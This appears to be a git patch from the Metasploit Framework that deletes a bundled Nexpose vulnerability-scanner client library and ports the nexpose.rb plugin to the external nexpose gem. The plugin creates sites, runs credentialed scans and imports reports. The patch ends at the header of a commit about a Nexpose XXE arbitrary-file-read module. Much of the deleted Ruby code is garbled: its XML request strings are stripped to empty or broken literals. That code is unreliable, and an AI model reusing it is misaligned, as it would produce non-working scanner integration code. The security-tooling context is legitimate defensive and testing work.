- attr_reader :recipients - # The vulnerability filter to trigger the alert - attr_reader :vulnFilter - # The alert type - attr_reader :type - - def initialize(name, sender, limitText, enabled = 1) - @type = :smtp - @name = name - @sender = sender - @enabled = enabled - @limitText = limitText - @recipients = Array.new() - # Sets default vuln filter - All Events - setVulnFilter(VulnFilter.new("50790400",1)) - end - - # Adds a new Recipient to the recipients array - def addRecipient(recipient) - @recipients.push(recipient) - end - - # Sets the Vulnerability Filter for this alert. - def setVulnFilter(vulnFilter) - @vulnFilter = vulnFilter - end - - include Sanitize - def to_xml - xml = "} - recipients.each do |recpt| - xml << "#{replace_entities(recpt)}" - end - xml << vulnFilter.to_xml - xml << "" - xml - end -end - -# === Description -# Object that represents an SNMP Alert. -# -class SnmpAlert - - # A unique name for this alert - attr_reader :name - # If this alert is enabled or not - attr_reader :enabled - # The community string - attr_reader :community - # The SNMP server to sent this alert - attr_reader :server - # The vulnerability filter to trigger the alert - attr_reader :vulnFilter - # The alert type - attr_reader :type - - def initialize(name, community, server, enabled = 1) - @type = :snmp - @name = name - @community = community - @server = server - @enabled = enabled - # Sets default vuln filter - All Events - setVulnFilter(VulnFilter.new("50790400",1)) - end - - # Sets the Vulnerability Filter for this alert. - def setVulnFilter(vulnFilter) - @vulnFilter = vulnFilter - end - - include Sanitize - def to_xml - xml = "} - xml << vulnFilter.to_xml - xml << "" - xml - end - -end - -# === Description -# Object that represents a Syslog Alert. -# -class SyslogAlert - - # A unique name for this alert - attr_reader :name - # If this alert is enabled or not - attr_reader :enabled - # The Syslog server to sent this alert - attr_reader :server - # The vulnerability filter to trigger the alert - attr_reader :vulnFilter - # The alert type - attr_reader :type - - def initialize(name, server, enabled = 1) - @type = :syslog - @name = name - @server = server - @enabled = enabled - # Sets default vuln filter - All Events - setVulnFilter(VulnFilter.new("50790400",1)) - - end - - # Sets the Vulnerability Filter for this alert. - def setVulnFilter(vulnFilter) - @vulnFilter = vulnFilter - end - - include Sanitize - def to_xml - xml = "} - xml << vulnFilter.to_xml - xml << "" - xml - end - -end - -# TODO: review -# -# === Description -# -class ScanFilter - - attr_reader :scanStop - attr_reader :scanFailed - attr_reader :scanStart - - def initialize(scanstop, scanFailed, scanStart) - - @scanStop = scanStop - @scanFailed = scanFailed - @scanStart = scanStart - - end - -end - -# TODO: review -# === Description -# -class VulnFilter - - attr_reader :typeMask - attr_reader :maxAlerts - attr_reader :severityThreshold - - def initialize(typeMask, severityThreshold, maxAlerts = -1) - @typeMask = typeMask - @maxAlerts = maxAlerts - @severityThreshold = severityThreshold - end - - include Sanitize - def to_xml - xml = "" - - xml - end - -end - -# TODO add engineID -# === Description -# Object that represents the scanning configuration for a Site. -# -class ScanConfig - # A unique ID for this scan configuration - attr_reader :configID - # The name of the scan template - attr_reader :name - # The ID of the scan template used full-audit, exhaustive-audit, web-audit, dos-audit, internet-audit, network-audit - attr_reader :templateID - # The configuration version (default is 2) - attr_reader :configVersion - # Array of (Schedule)* - attr_reader :schedules - # Array of (ScanTrigger)* - attr_reader :scanTriggers - - def initialize(configID, name, templateID, configVersion = 2) - - @configID = configID - @name = name - @templateID = templateID - @configVersion = configVersion - @schedules = Array.new() - @scanTriggers = Array.new() - - end - - # Adds a new Schedule for this ScanConfig - def addSchedule(schedule) - @schedules.push(schedule) - end - - # Adds a new ScanTrigger to the scanTriggers array - def addScanTrigger(scanTrigger) - @scanTriggers.push(scanTrigger) - end - - def _set_configID(configID) - @configID = configID - end - - def _set_name(name) - @name = name - end - -end - -# === Description -# Object that holds a scan schedule -# -class Schedule - # Type of Schedule (daily|hourly|monthly|weekly) - attr_reader :type - # The schedule interval - attr_reader :interval - # The date and time to start the first scan - attr_reader :start - # Enable or disable this schedule - attr_reader :enabled - # The date and time to disable to schedule. If null then the schedule will run forever. - attr_reader :notValidAfter - # Scan on the same date each time - attr_reader :byDate - - def initialize(type, interval, start, enabled = 1) - - @type = type - @interval = interval - @start = start - @enabled = enabled - - end - - - -end - -# === Description -# Object that holds an event that triggers the start of a scan. -# -class ScanTrigger - # Type of Trigger (AutoUpdate) - attr_reader :type - # Enable or disable this scan trigger - attr_reader :enabled - # Sets the trigger to start an incremental scan or a full scan - attr_reader :incremental - - def initialize(type, incremental, enabled = 1) - - @type = type - @incremental = incremental - @enabled = enabled - - end - -end - -# === Description -# Object that represents a single device in an NSC. -# -class Device - - # A unique device ID (assigned by the NSC) - attr_reader :id - # The site ID of this devices site - attr_reader :site_id - # IP Address or Hostname of this device - attr_reader :address - # User assigned risk multiplier - attr_reader :riskfactor - # Nexpose risk score - attr_reader :riskscore - - def initialize(id, site_id, address, riskfactor=1, riskscore=0) - @id = id - @site_id = site_id - @address = address - @riskfactor = riskfactor - @riskscore = riskscore - - end - -end - - -# === Description -# Object that represents a summary of a scan. -# -class ScanSummary - # The Scan ID of the Scan - attr_reader :scan_id - # The Engine ID used to perform the scan - attr_reader :engine_id - # TODO: add description - attr_reader :name - # The scan start time - attr_reader :startTime - # The scan finish time - attr_reader :endTime - # The scan status (running|finished|stopped|error| dispatched|paused|aborted|uknown) - attr_reader :status - # The number of pending tasks - attr_reader :tasks_pending - # The number of active tasks - attr_reader :tasks_active - # The number of completed tasks - attr_reader :tasks_completed - # The number of "live" nodes - attr_reader :nodes_live - # The number of "dead" nodes - attr_reader :nodes_dead - # The number of filtered nodes - attr_reader :nodes_filtered - # The number of unresolved nodes - attr_reader :nodes_unresolved - # The number of "other" nodes - attr_reader :nodes_other - # Confirmed vulnerabilities found (indexed by severity) - # Associative array, indexed by severity - attr_reader :vuln_exploit - # Unconfirmed vulnerabilities found (indexed by severity) - # Associative array, indexed by severity - attr_reader :vuln_version - # Not vulnerable checks run (confirmed) - attr_reader :not_vuln_exploit - # Not vulnerable checks run (unconfirmed) - attr_reader :not_vuln_version - # Vulnerability check errors - attr_reader :vuln_error - # Vulnerability checks disabled - attr_reader :vuln_disabled - # Vulnerability checks other - attr_reader :vuln_other - - # Constructor - # ScanSummary(can_id, $engine_id, $name, tartTime, $endTime, tatus) - def initialize(scan_id, engine_id, name, startTime, endTime, status) - - @scan_id = scan_id - @engine_id = engine_id - @name = name - @startTime = startTime - @endTime = endTime - @status = status - - end - -end - -# TODO -# === Description -# Object that represents the overview statistics for a particular scan. -# -# === Examples -# -# # Create a new Nexpose Connection on the default port and Login -# nsc = Connection.new("10.1.40.10","nxadmin","password") -# nsc.login() -# -# # Get a Site (Site ID = 12) from the NSC -# site = new Site(nsc,12) -# -# # Start a Scan of this site and pause for 1 minute -# scan1 = site.scanSite() -# sleep(60) -# -# # Get the Scan Statistics for this scan -# scanStatistics = new ScanStatistics(nsc,scan1["scan_id"]) -# -# # Print out number of confirmed vulnerabilities with a 10 severity -# puts scanStatistics.scansummary.vuln_exploit[10] -# -# # Print out the number of pending tasks left in the scan -# puts scanStatistics.scan_summary.tasks_pending -# -class ScanStatistics - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :reseponse_xml - # The Scan ID - attr_reader :scan_id - # The ScanSummary of the scan - attr_reader :scan_summary - # The NSC Connection associated with this object - attr_reader :connection - - # Vulnerability checks other - attr_reader :vuln_other - def initialize(connection, scan_id) - @error = false - @connection = connection - @scan_id = scan_id - end -end - -# ==== Description -# Object that represents a listing of all of the scan engines available on to an NSC. -# -class EngineListing - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # The NSC Connection associated with this object - attr_reader :connection - # Array containing (EngineSummary*) - attr_reader :engines - # The number of scan engines - attr_reader :engine_count - - # Constructor - # EngineListing (connection) - def initialize(connection) - @connection = connection - end -end - -# ==== Description -# Object that represents the summary of a scan engine. -# -# ==== Examples -# -# # Create a new Nexpose Connection on the default port and Login -# nsc = Connection.new("10.1.40.10","nxadmin","password") -# nsc.login() -# -# # Get the engine listing for the connection -# enginelisting = EngineListing.new(nsc) -# -# # Print out the status of the first scan engine -# puts enginelisting.engines[0].status -# -class EngineSummary - # A unique ID that identifies this scan engine - attr_reader :id - # The name of this scan engine - attr_reader :name - # The hostname or IP address of the engine - attr_reader :address - # The port there the engine is listening - attr_reader :port - # The engine status (active|pending-auth| incompatible|not-responding|unknown) - attr_reader :status - - # Constructor - # EngineSummary(id, name, address, port, status) - def initialize(id, name, address, port, status) - @id = id - @name = name - @address = address - @port = port - @status = status - end - -end - - -# TODO -class EngineActivity - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # The NSC Connection associated with this object - attr_reader :connection - # The Engine ID - attr_reader :engine_id - # Array containing (ScanSummary*) - attr_reader :scan_summaries - - -end - -# === Description -# Object that represents a listing of all of the vulnerabilities in the vulnerability database -# -class VulnerabilityListing - - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # The NSC Connection associated with this object - attr_reader :connection - # Array containing (VulnerabilitySummary*) - attr_reader :vulnerability_summaries - # The number of vulnerability definitions - attr_reader :vulnerability_count - - # Constructor - # VulnerabilityListing(connection) - def initialize(connection) - @error = false - @vulnerability_summaries = [] - @connection = connection - - r = @connection.execute('') - - if (r.success) - r.res.elements.each('VulnerabilityListingResponse/VulnerabilitySummary') do |v| - @vulnerability_summaries.push(VulnerabilitySummary.new(v.attributes['id'],v.attributes["title"],v.attributes["severity"])) - end - else - @error = true - @error_msg = 'VulnerabilitySummaryRequest Parse Error' - end - @vulnerability_count = @vulnerability_summaries.length - end -end - -# === Description -# Object that represents the summary of an entry in the vulnerability database -# -class VulnerabilitySummary - - # The unique ID string for this vulnerability - attr_reader :id - # The title of this vulnerability - attr_reader :title - # The severity of this vulnerability (1 – 10) - attr_reader :severity - - # Constructor - # VulnerabilitySummary(id, title, severity) - def initialize(id, title, severity) - @id = id - @title = title - @severity = severity - - end - -end - -# === Description -# -class Reference - - attr_reader :source - attr_reader :reference - - def initialize(source, reference) - @source = source - @reference = reference - end -end - -# === Description -# Object that represents the details for an entry in the vulnerability database -# -class VulnerabilityDetail - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # The NSC Connection associated with this object - attr_reader :connection - # The unique ID string for this vulnerability - attr_reader :id - # The title of this vulnerability - attr_reader :title - # The severity of this vulnerability (1 – 10) - attr_reader :severity - # The pciSeverity of this vulnerability - attr_reader :pciSeverity - # The CVSS score of this vulnerability - attr_reader :cvssScore - # The CVSS vector of this vulnerability - attr_reader :cvssVector - # The date this vulnerability was published - attr_reader :published - # The date this vulnerability was added to Nexpose - attr_reader :added - # The last date this vulnerability was modified - attr_reader :modified - # The HTML Description of this vulnerability - attr_reader :description - # External References for this vulnerability - # Array containing (Reference) - attr_reader :references - # The HTML Solution for this vulnerability - attr_reader :solution - - # Constructor - # VulnerabilityListing(connection,id) - def initialize(connection, id) - - @error = false - @connection = connection - @id = id - @references = [] - - r = @connection.execute('') - - if (r.success) - r.res.elements.each('VulnerabilityDetailsResponse/Vulnerability') do |v| - @id = v.attributes['id'] - @title = v.attributes["title"] - @severity = v.attributes["severity"] - @pciSeverity = v.attributes['pciSeverity'] - @cvssScore = v.attributes['cvssScore'] - @cvssVector = v.attributes['cvssVector'] - @published = v.attributes['published'] - @added = v.attributes['added'] - @modified = v.attributes['modified'] - - v.elements.each('description') do |d| - @description = d.to_s.gsub(/\<\/?description\>/i, '') - end - - v.elements.each('solution') do |s| - @solution = s.to_s.gsub(/\<\/?solution\>/i, '') - end - - v.elements.each('references/reference') do |r| - @references.push(Reference.new(r.attributes['source'],r.text)) - end - end - else - @error = true - @error_msg = 'VulnerabilitySummaryRequest Parse Error' - end - - end -end - -# === Description -# Object that represents the summary of a Report Configuration. -# -class ReportConfigSummary - # The Report Configuration ID - attr_reader :id - # A unique name for the Report - attr_reader :name - # The report format - attr_reader :format - # The date of the last report generation - attr_reader :last_generated_on - # Relative URI of the last generated report - attr_reader :last_generated_uri - - # Constructor - # ReportConfigSummary(id, name, format, last_generated_on, last_generated_uri) - def initialize(id, name, format, last_generated_on, last_generated_uri) - - @id = id - @name = name - @format = format - @last_generated_on = last_generated_on - @last_generated_uri = last_generated_uri - - end - -end - -# === Description -# Object that represents the schedule on which to automatically generate new reports. -class ReportHistory - - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # The NSC Connection associated with this object - attr_reader :connection - # The report definition (report config) ID - # Report definition ID - attr_reader :config_id - # Array (ReportSummary*) - attr_reader :report_summaries - - - def initialize(connection, config_id) - - @error = false - @connection = connection - @config_id = config_id - @report_summaries = [] - - reportHistory_request = APIRequest.new('',@connection.geturl()) - reportHistory_request.execute() - @response_xml = reportHistory_request.response_xml - @request_xml = reportHistory_request.request_xml - - end - - def xml_parse(response) - response = REXML::Document.new(response.to_s) - status = response.root.attributes['success'] - if (status == '1') - response.elements.each('ReportHistoryResponse/ReportSummary') do |r| - @report_summaries.push(ReportSummary.new(r.attributes["id"], r.attributes["cfg-id"], r.attributes["status"], r.attributes["generated-on"],r.attributes['report-uri'])) - end - else - @error = true - @error_msg = 'Error ReportHistoryReponse' - end - end - -end - -# === Description -# Object that represents the summary of a single report. -class ReportSummary - - # The Report ID - attr_reader :id - # The Report Configuration ID - attr_reader :cfg_id - # The status of this report - # available | generating | failed - attr_reader :status - # The date on which this report was generated - attr_reader :generated_on - # The relative URI of the report - attr_reader :report_uri - - def initialize(id, cfg_id, status, generated_on, report_uri) - - @id = id - @cfg_id = cfg_id - @status = status - @generated_on = generated_on - @report_uri = report_uri - - end - -end - -# === Description -# - class ReportAdHoc - include XMLUtils - - attr_reader :error - attr_reader :error_msg - attr_reader :connection - # Report Template ID strong e.g. full-audit - attr_reader :template_id - # pdf|html|xml|text|csv|raw-xml-v2 - attr_reader :format - # Array of (ReportFilter)* - attr_reader :filters - attr_reader :request_xml - attr_reader :response_xml - attr_reader :report_decoded - - - def initialize(connection, template_id = 'full-audit', format = 'raw-xml-v2') - - @error = false - @connection = connection - @filters = Array.new() - @template_id = template_id - @format = format - - end - - def addFilter(filter_type, id) - - # filter_type can be site|group|device|scan - # id is the ID number. For scan, you can use 'last' for the most recently run scan - filter = ReportFilter.new(filter_type, id) - filters.push(filter) - - end - - def generate() - request_xml = '' - request_xml += '' - request_xml += '' - @filters.each do |f| - request_xml += '' - end - request_xml += '' - request_xml += '' - request_xml += '' - - ad_hoc_request = APIRequest.new(request_xml, @connection.url) - ad_hoc_request.execute() - - content_type_response = ad_hoc_request.raw_response.header['Content-Type'] - if content_type_response =~ /multipart\/mixed;\s*boundary=([^\s]+)/ - # Nexpose sends an incorrect boundary format which breaks parsing - # Eg: boundary=XXX; charset=XXX - # Fix by removing everything from the last semi-colon onward - last_semi_colon_index = content_type_response.index(/;/, content_type_response.index(/boundary/)) - content_type_response = content_type_response[0, last_semi_colon_index] - - data = "Content-Type: " + content_type_response + "\r\n\r\n" + ad_hoc_request.raw_response_data - doc = Rex::MIME::Message.new data - doc.parts.each do |part| - if /.*base64.*/ =~ part.header.to_s - return parse_xml(part.content.unpack("m*")[0]) - end - end - end - end - - end - -# === Description -# Object that represents the configuration of a report definition. -# -class ReportConfig - - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # The NSC Connection associated with this object - attr_reader :connection - # The ID for this report definition - attr_reader :config_id - # A unique name for this report definition - attr_reader :name - # The template ID used for this report definition - attr_reader :template_id - # html, db, txt, xml, raw-xml-v2, csv, pdf - attr_reader :format - # XXX new - attr_reader :timezone - # XXX new - attr_reader :owner - # Array of (ReportFilter)* - The Sites, Asset Groups, or Devices to run the report against - attr_reader :filters - # Automatically generate a new report at the conclusion of a scan - # 1 or 0 - attr_reader :generate_after_scan - # Schedule to generate reports - # ReportSchedule Object - attr_reader :schedule - # Store the reports on the server - # 1 or 0 - attr_reader :storeOnServer - # Location to store the report on the server - attr_reader :store_location - # Form to send the report via email - # "file", "zip", "url", or NULL (don’t send email) - attr_reader :email_As - # Send the Email to all Authorized Users - # boolean - Send the Email to all Authorized Users - attr_reader :email_to_all - # Array containing the email addresses of the recipients - attr_reader :email_recipients - # IP Address or Hostname of SMTP Relay Server - attr_reader :smtp_relay_server - # Sets the FROM field of the Email - attr_reader :sender - # TODO - attr_reader :db_export - # TODO - attr_reader :csv_export - # TODO - attr_reader :xml_export - - - def initialize(connection, config_id = -1) - - @error = false - @connection = connection - @config_id = config_id - @xml_tag_stack = Array.new() - @filters = Array.new() - @email_recipients = Array.new() - @name = "New Report " + rand(999999999).to_s - - r = @connection.execute('') - if (r.success) - r.res.elements.each('ReportConfigResponse/ReportConfig') do |r| - @name = r.attributes['name'] - @format = r.attributes['format'] - @timezone = r.attributes['timezone'] - @id = r.attributes['id'] - @template_id = r.attributes['template-id'] - @owner = r.attributes['owner'] - end - else - @error = true - @error_msg = 'Error ReportHistoryReponse' - end - end - - # === Description - # Generate a new report on this report definition. Returns the new report ID. - def generateReport(debug = false) - return generateReport(@connection, @config_id, debug) - end - - # === Description - # Save the report definition to the NSC. - # Returns the config-id. - def saveReport() - r = @connection.execute('' + getXML().to_s + ' ') - if(r.success) - @config_id = r.attributes['reportcfg-id'] - return true - end - return false - end - - # === Description - # Adds a new filter to the report config - def addFilter(filter_type, id) - filter = ReportFilter.new(filter_type,id) - @filters.push(filter) - end - - # === Description - # Adds a new email recipient - def addEmailRecipient(recipient) - @email_recipients.push(recipient) - end - - # === Description - # Sets the schedule for this report config - def setSchedule(schedule) - @schedule = schedule - end - - def getXML() - - xml = '' - - xml += ' ' - - @filters.each do |f| - xml += ' <' + f.type.to_s + ' id="' + f.id.to_s + '"/>' - end - - xml += ' ' - - xml += ' ' - - if (@schedule) - xml += ' ' - end - - xml += ' ' - - xml += ' ' - - xml += ' ' - - if (@store_location and @store_location.length > 0) - xml += ' ' + @store_location.to_s + '' - end - - xml += ' ' - - - xml += ' ' - - xml += ' ' - - return xml - end - - def set_name(name) - @name = name - end - - def set_template_id(template_id) - @template_id = template_id - end - - def set_format(format) - @format = format - end - - def set_email_As(email_As) - @email_As = email_As - end - - def set_storeOnServer(storeOnServer) - @storeOnServer = storeOnServer - end - - def set_smtp_relay_server(smtp_relay_server) - @smtp_relay_server = smtp_relay_server - end - - def set_sender(sender) - @sender = sender - end - - def set_generate_after_scan(generate_after_scan) - @generate_after_scan = generate_after_scan - end -end - -# === Description -# Object that represents a report filter which determines which sites, asset -# groups, and/or devices that a report is run against. gtypes are -# "SiteFilter", "AssetGroupFilter", "DeviceFilter", or "ScanFilter". gid is -# the site-id, assetgroup-id, or devce-id. ScanFilter, if used, specifies -# a specifies a specific scan to use as the data source for the report. The gid -# can be a specific scan-id or "first" for the first run scan, or “last” for -# the last run scan. -# -class ReportFilter - - attr_reader :type - attr_reader :id - - def initialize(type, id) - - @type = type - @id = id - - end - -end - -# === Description -# Object that represents the schedule on which to automatically generate new reports. -# -class ReportSchedule - - # The type of schedule - # (daily, hourly, monthly, weekly) - attr_reader :type - # The frequency with which to run the scan - attr_reader :interval - # The earliest date to generate the report - attr_reader :start - - def initialize(type, interval, start) - - @type = type - @interval = interval - @start = start - - end - - -end - -class ReportTemplateListing - - attr_reader :error_msg - attr_reader :error - attr_reader :request_xml - attr_reader :response_xml - attr_reader :connection - attr_reader :xml_tag_stack - attr_reader :report_template_summaries#; //Array (ReportTemplateSummary*) - - - def ReportTemplateListing(connection) - - @error = nil - @connection = connection - @report_template_summaries = Array.new() - - r = @connection.execute('') - if (r.success) - r.res.elements.each('ReportTemplateListingResponse/ReportTemplateSummary') do |r| - @report_template_summaries.push(ReportTemplateSumary.new(r.attributes['id'],r.attributes['name'])) - end - else - @error = true - @error_msg = 'ReportTemplateListingRequest Parse Error' - end - - end - -end - - -class ReportTemplateSummary - - attr_reader :id - attr_reader :name - attr_reader :description - - def ReportTemplateSummary(id, name, description) - - @id = id - @name = name - @description = description - - end - -end - - -class ReportSection - - attr_reader :name - attr_reader :properties - - def ReportSection(name) - - @properties = Array.new() - @name = name - end - - - def addProperty(name, value) - - @properties[name.to_s] = value - end - -end - - -# TODO add -def self.site_device_scan(connection, site_id, device_array, host_array, debug = false) - - request_xml = '' - request_xml += '' - device_array.each do |d| - request_xml += '' - end - request_xml += '' - request_xml += '' - # The host array can only by single IP addresses for now. TODO: Expand to full API Spec. - host_array.each do |h| - request_xml += '' - end - request_xml += '' - request_xml += '' - - r = connection.execute(request_xml) - r.success ? { :engine_id => r.attributes['engine_id'], :scan_id => r.attributes['scan-id'] } : nil -end - -# === Description -# TODO -def self.getAttribute(attribute, xml) - value = '' - #@value = substr(substr(strstr(strstr(@xml,@attribute),'"'),1),0,strpos(substr(strstr(strstr(@xml,@attribute),'"'),1),'"')) - return value -end - -# === Description -# Returns an ISO 8601 formatted date/time stamp. All dates in Nexpose must use this format. -def self.get_iso_8601_date(int_date) -#@date_mod = date('Ymd\THis000', @int_date) - date_mod = '' -return date_mod -end - -# ==== Description -# Echos the last XML API request and response for the specified object. (Useful for debugging) -def self.printXML(object) - puts "request" + object.request_xml.to_s - puts "response is " + object.response_xml.to_s -end - -end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index f60210fd41..97c223eaed 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -163,4 +163,6 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'openvas-omp' # Needed by metasploit nessus bridge spec.add_runtime_dependency 'nessus_rest' + # Nexpose Gem + spec.add_runtime_dependency 'nexpose' end diff --git a/plugins/nexpose.rb b/plugins/nexpose.rb index 00c1173bc1..854a3dfd53 100644 --- a/plugins/nexpose.rb +++ b/plugins/nexpose.rb @@ -6,8 +6,7 @@ # # $Revision$ # - -require 'rapid7/nexpose' +require 'nexpose' module Msf Nexpose_yaml = "#{Msf::Config.get_config_root}/nexpose.yaml" #location of the nexpose.yml containing saved nexpose creds @@ -165,7 +164,7 @@ class Plugin::Nexpose < Msf::Plugin begin print_status("Connecting to Nexpose instance at #{@host}:#{@port} with username #{@user}...") - nsc = ::Nexpose::Connection.new(@host, @user, @pass, @port) + nsc = Nexpose::Connection.new(@host, @user, @pass, @port) nsc.login rescue ::Nexpose::APIError => e print_error("Connection failed: #{e.reason}") @@ -191,21 +190,21 @@ class Plugin::Nexpose < Msf::Plugin end scans.each do |scan| - print_status(" Scan ##{scan[:scan_id]} is running on Engine ##{scan[:engine_id]} against site ##{scan[:site_id]} since #{scan[:start_time].to_s}") + print_status(" Scan ##{scan.scan_id} is running on Engine ##{scan.engine_id} against site ##{scan.site_id} since #{scan.start_time.to_s}") end end def cmd_nexpose_sites(*args) return if not nexpose_verify - sites = @nsc.site_listing || [] + sites = @nsc.list_sites || [] case sites.length when 0 print_status("There are currently no active sites on this Nexpose instance") end sites.each do |site| - print_status(" Site ##{site[:site_id]} '#{site[:name]}' Risk Factor: #{site[:risk_factor]} Risk Score: #{site[:risk_score]}") + print_status(" Site ##{site.id} '#{site.name}' Risk Factor: #{site.risk_factor} Risk Score: #{site.risk_score}") end end @@ -218,24 +217,24 @@ class Plugin::Nexpose < Msf::Plugin return end - devices = @nsc.site_device_listing(site_id) || [] + devices = @nsc.list_site_devices(site_id) || [] case devices.length when 0 print_status("There are currently no devices within this site") end devices.each do |device| - print_status(" Host: #{device[:address]} ID: #{device[:device_id]} Risk Factor: #{device[:risk_factor]} Risk Score: #{device[:risk_score]}") + print_status(" Host: #{device.address} ID: #{device.id} Risk Factor: #{device.risk_factor} Risk Score: #{device.risk_score}") end end def cmd_nexpose_report_templates(*args) return if not nexpose_verify - res = @nsc.report_template_listing || [] + res = @nsc.list_report_templates || [] res.each do |report| - print_status(" Template: #{report[:template_id]} Name: '#{report[:name]}' Description: #{report[:description]}") + print_status(" Template: #{report.id} Name: '#{report.name}' Description: #{report.description}") end end @@ -287,17 +286,12 @@ class Plugin::Nexpose < Msf::Plugin report_formats = ["raw-xml-v2", "ns-xml"] report_format = report_formats.shift - report = Nexpose::ReportConfig.new(@nsc) - report.set_name("Metasploit Export #{msfid}") - report.set_template_id("pentest-audit") - - report.addFilter("SiteFilter", site_id) - report.set_generate_after_scan(0) - report.set_storeOnServer(1) + report = Nexpose::ReportConfig.build(@nsc, site_id, "Metasploit Export #{msfid}", "pentest-audit", report_format, true) + report.delivery = Nexpose::Delivery.new(true) begin - report.set_format(report_format) - report.saveReport() + report.format = report_format + report.save(@nsc) rescue ::Exception => e report_format = report_formats.shift if report_format @@ -307,17 +301,18 @@ class Plugin::Nexpose < Msf::Plugin end print_status("Generating the export data file...") - url = nil - while(! url) - url = @nsc.report_last(report.config_id) + last_report = nil + while(! last_report) + last_report = @nsc.last_report(report.id) select(nil, nil, nil, 1.0) end + url = last_report.uri print_status("Downloading the export data...") data = @nsc.download(url) # Delete the temporary report ID - @nsc.report_config_delete(report.config_id) + @nsc.delete_report_config(report.id) print_status("Importing Nexpose data...") process_nexpose_data(report_format, data) @@ -390,8 +385,9 @@ class Plugin::Nexpose < Msf::Plugin when "-c" if (val =~ /^([^:]+):([^:]+):(.+)/) type, user, pass = [ $1, $2, $3 ] - newcreds = Nexpose::AdminCredentials.new - newcreds.setCredentials(type, nil, nil, user, pass, nil) + newcreds = Nexpose::SiteCredentials.for_service("temporary_name", nil, nil, nil, nil, type) + newcreds.user_name = user + newcreds.password = pass opt_credentials << newcreds else print_error("Unrecognized Nexpose scan credentials: #{val}") @@ -482,33 +478,24 @@ class Plugin::Nexpose < Msf::Plugin msfid = Time.now.to_i # Create a temporary site - site = Nexpose::Site.new(@nsc) - site.setSiteConfig("Metasploit-#{msfid}", "Autocreated by the Metasploit Framework") - queue.each do |ip| - site.site_config.addHost(Nexpose::IPRange.new(ip)) - end - site.site_config._set_scanConfig(Nexpose::ScanConfig.new(-1, "tmp", opt_template)) - opt_credentials.each do |c| - site.site_config.addCredentials(c) - end - site.saveSite() + site = Nexpose::Site.new(nil, opt_template) + site.name = "Metasploit-#{msfid}" + site.description = "Autocreated by the Metasploit Framework" + site.included_addresses = queue + site.site_credentials = opt_credentials + site.save(@nsc) - print_status(" >> Created temporary site ##{site.site_id}") if opt_verbose + print_status(" >> Created temporary site ##{site.id}") if opt_verbose report_formats = ["raw-xml-v2", "ns-xml"] report_format = report_formats.shift - report = Nexpose::ReportConfig.new(@nsc) - report.set_name("Metasploit Export #{msfid}") - report.set_template_id(opt_template) - - report.addFilter("SiteFilter", site.site_id) - report.set_generate_after_scan(1) - report.set_storeOnServer(1) + report = Nexpose::ReportConfig.build(@nsc, site.id, site.name, opt_template, report_format, true) + report.delivery = Nexpose::Delivery.new(true) begin - report.set_format(report_format) - report.saveReport() + report.format = report_format + report.save(@nsc, true) rescue ::Exception => e report_format = report_formats.shift if report_format @@ -517,18 +504,19 @@ class Plugin::Nexpose < Msf::Plugin raise e end - print_status(" >> Created temporary report configuration ##{report.config_id}") if opt_verbose + print_status(" >> Created temporary report configuration ##{report.id}") if opt_verbose # Run the scan begin - res = site.scanSite() + res = site.scan(@nsc) rescue Nexpose::APIError => e nexpose_error_message = e.message nexpose_error_message.gsub!(/NexposeAPI: Action failed: /, '') print_error "#{nexpose_error_message}" return end - sid = res[:scan_id] + + sid = res.id print_status(" >> Scan has been launched with ID ##{sid}") if opt_verbose @@ -537,8 +525,8 @@ class Plugin::Nexpose < Msf::Plugin prev = nil while(true) info = @nsc.scan_statistics(sid) - break if info[:summary]['status'] != "running" - stat = "Found #{info[:nodes]['live']} devices and #{info[:nodes]['dead']} unresponsive" + break if info.status != "running" + stat = "Found #{info.nodes.live} devices and #{info.nodes.dead} unresponsive" if(stat != prev) print_status(" >> #{stat}") if opt_verbose end @@ -549,18 +537,19 @@ class Plugin::Nexpose < Msf::Plugin rescue ::Interrupt rep = false print_status(" >> Terminating scan ID ##{sid} due to console interupt") if opt_verbose - @nsc.scan_stop(sid) + @nsc.stop_scan(sid) break end # Wait for the automatic report generation to complete if(rep) print_status(" >> Waiting on the report to generate...") if opt_verbose - url = nil - while(! url) - url = @nsc.report_last(report.config_id) + last_report = nil + while(! last_report) + last_report = @nsc.last_report(report.id) select(nil, nil, nil, 1.0) end + url = last_report.uri print_status(" >> Downloading the report data from Nexpose...") if opt_verbose data = @nsc.download(url) @@ -577,7 +566,11 @@ class Plugin::Nexpose < Msf::Plugin if ! opt_preserve print_status(" >> Deleting the temporary site and report...") if opt_verbose - @nsc.site_delete(site.site_id) + begin + @nsc.delete_site(site.id) + rescue ::Nexpose::APIError => e + print_status(" >> Deletion of temporary site and report failed: #{e.inspect}") + end end end @@ -675,3 +668,15 @@ class Plugin::Nexpose < Msf::Plugin end end end + +module Nexpose + class IPRange + def to_json + if @to.present? + "#{@from} - #{@to}".to_json + else + @from.to_json + end + end + end +end \ No newline at end of file From 1c6d7ee33e28d2ce7e14751b5d9e9e55c79435ca Mon Sep 17 00:00:00 2001 From: Louis Sato Date: Fri, 8 Apr 2016 20:37:13 -0500 Subject: [PATCH 02/37] additional changes for Nexpose XXE Arbitrary File Read --- modules/auxiliary/admin/http/nexpose_xxe_file_read.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb 